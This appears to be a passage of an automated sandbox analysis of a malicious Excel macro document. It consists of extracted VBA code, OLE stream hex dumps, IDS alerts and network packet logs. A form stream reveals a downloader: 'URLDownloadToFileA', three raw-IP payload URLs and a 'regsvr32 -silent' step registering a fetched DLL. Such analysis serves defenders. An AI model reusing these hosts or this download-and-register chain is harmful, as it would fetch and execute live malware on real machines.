    ActiveSheet.Shapes("Button_Print_PDF").Visible = True
    ActiveSheet.Shapes("Button_Save_As").Visible = True
    ActiveSheet.Shapes("Button_Help").Visible = True
    ActiveSheet.Shapes("Button_Versions").Visible = True
    Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

Else

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = True
    ActiveSheet.Shapes("Win_Logo").Visible = False
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
    ActiveSheet.Shapes("Button_Print_PDF").Visible = False
    ActiveSheet.Shapes("Button_Save_As").Visible = False
    Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

End If

    Application.ScreenUpdating = True

End Sub


Private Sub asWorkbook_Activateas()

End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
End Sub

VBA File Name: UserForm2, Stream Size: 1182

General
Stream Path:	_VBA_PROJECT_CUR/VBA/UserForm2
VBA File Name:	UserForm2
Stream Size:	1182
Data ASCII:	. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{2BEEDB10-702C-4639-85B4-348EEF57BA36}{68EBBE76-267A-4441-B0C5-391CDE4F754A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	108
Entropy:	4.18849998853
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.65175227267
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	208
Entropy:	3.36293009449
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . S . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101939

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	101939
Entropy:	7.65119679496
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V q % 8 . . . . . . . X . @
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 704

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	704
Entropy:	5.26790967991
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37

Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTlk
File Type:	dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
Stream Size:	30
Entropy:	1.37215976263
Base64 Encoded:	False
Data ASCII:	. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
Data Raw:	01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 140

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	140
Entropy:	3.43277227638
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00

Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	302
Entropy:	4.65616494784
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69

Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 263

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/f
File Type:	data
Stream Size:	263
Entropy:	3.64267276758
Base64 Encoded:	False
Data ASCII:	. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . o . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . P . . . . . . . B l o s t 3 . . .
Data Raw:	00 04 24 00 08 0c 10 0c 0b 00 00 00 ff ff 00 00 13 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 6f 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d4 00 00 00 d4

Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 296

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/o
File Type:	data
Stream Size:	296
Entropy:	3.90075632428
Base64 Encoded:	True
Data ASCII:	. . ( . ( . . . . . . . h t t p : / / 1 9 4 . 3 6 . 1 9 1 . 2 1 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 2 3 . 5 3 . 1 9 9 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 0 1 . 9 9 . 9 0 . 1 1 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . 0 . ( . . . . . . . r e g s v r 3 2 - s i l e n t . . \\ C e l o d . w a
Data Raw:	00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 34 2e 33 36 2e 31 39 31 2e 32 31 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 28 00 28 00 00 00 16 00 00 80 68 74 74 70 3a 2f 2f 31 38 35 2e 31 32 33 2e 35 33 2e 31 39 39 2f 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4556

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4556
Entropy:	4.48021455274
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2541

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2541
Entropy:	3.52398995265
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . M . . . . . F
Data Raw:	93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 146

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	146
Entropy:	1.48909835582
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 265

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	265
Entropy:	2.03061914699
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	256
Entropy:	1.83163031329
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1077

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	1077
Entropy:	6.67426946485
Base64 Encoded:	True
Data ASCII:	. 1 . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . S c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
Data Raw:	01 31 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 82 dd a0 53 63 03 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
10/05/21-22:16:40.041813	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.155	192.168.2.22
10/05/21-22:16:43.057726	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.155	192.168.2.22
10/05/21-22:16:49.061993	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.155	192.168.2.22
10/05/21-22:17:00.461696	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.153	192.168.2.22
10/05/21-22:17:03.461815	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.153	192.168.2.22
10/05/21-22:17:11.065674	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.153	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2021 22:16:37.979377985 CEST	49165	80	192.168.2.22	194.36.191.21
Oct 5, 2021 22:16:40.982760906 CEST	49165	80	192.168.2.22	194.36.191.21
Oct 5, 2021 22:16:46.989146948 CEST	49165	80	192.168.2.22	194.36.191.21
Oct 5, 2021 22:16:59.005861044 CEST	49166	80	192.168.2.22	194.36.191.21
Oct 5, 2021 22:17:02.013386011 CEST	49166	80	192.168.2.22	194.36.191.21
Oct 5, 2021 22:17:08.035434961 CEST	49166	80	192.168.2.22	194.36.191.21
Oct 5, 2021 22:17:20.082181931 CEST	49167	80	192.168.2.22	185.123.53.199
Oct 5, 2021 22:17:23.106220007 CEST	49167	80	192.168.2.22	185.123.53.199
Oct 5, 2021 22:17:29.112958908 CEST	49167	80	192.168.2.22	185.123.53.199
Oct 5, 2021 22:17:41.127726078 CEST	49168	80	192.168.2.22	185.123.53.199
Oct 5, 2021 22:17:44.137038946 CEST	49168	80	192.168.2.22	185.123.53.199
Oct 5, 2021 22:17:50.143568993 CEST	49168	80	192.168.2.22	185.123.53.199
Oct 5, 2021 22:18:02.205498934 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:02.376368999 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:02.376533985 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:02.377396107 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:02.548046112 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.288743973 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.288815975 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.288870096 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.288928986 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.288986921 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.289041996 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.289086103 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.289144039 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.289211035 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.289213896 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.289251089 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.289411068 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.301124096 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.460503101 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460566044 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460618019 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460681915 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460737944 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460793972 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460793972 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.460833073 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.460839987 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.460844994 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460892916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460896969 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.460912943 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.460937023 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.460938931 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.460983038 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.461009026 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.461028099 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.461044073 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.461081028 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.461086988 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.461129904 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.461148024 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.461174965 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.461183071 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.461220980 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.461247921 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.461266994 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.461281061 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.461306095 CEST	80	49169	101.99.90.118	192.168.2.22
